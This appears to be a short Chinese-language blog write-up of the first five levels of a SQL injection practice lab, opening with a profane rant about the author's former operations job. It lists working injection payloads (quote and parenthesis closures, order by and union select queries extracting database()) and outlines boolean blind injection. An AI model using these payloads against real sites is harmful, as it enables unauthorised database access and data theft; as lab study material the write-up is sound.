因为好久都没有联系过SQL注入了,打算重新拾起渗透方向的能力,去他妈的运维,老子才不要做运维,被傻逼公司给骗了,当了一年的运维,白白浪费了一年。
第一关
先查看一下代码:
真正的关于注入的核心语句就只有中间的select查询语句,一是先看是什么闭合,第二再看有没有过滤
没有任何的过滤,然后是单引号闭合。
构建注入语句:1' and 1=2 -- qwe
发现结果报错,说明该已经正确闭合,接下来就是常规操作
1' order by 3 -- qwe
1' union select 1,2,3 -- qwe
-1' union select 1,database(),3 -- qwe
第二关
很简单的数字类型的注入
?id=1 and 1=2
第三关
单引号括号注入
?id=1') and 1=2 -- qwe
第四关
双引号括号注入
1") and 1=2 -- qwe
第五关
布尔盲注
不会查出我们具体想要的数据,只会显示True OR False
思路就是先根据回显出的布尔类型的数值,然后找到闭合,然后通过爆破找到想要的内容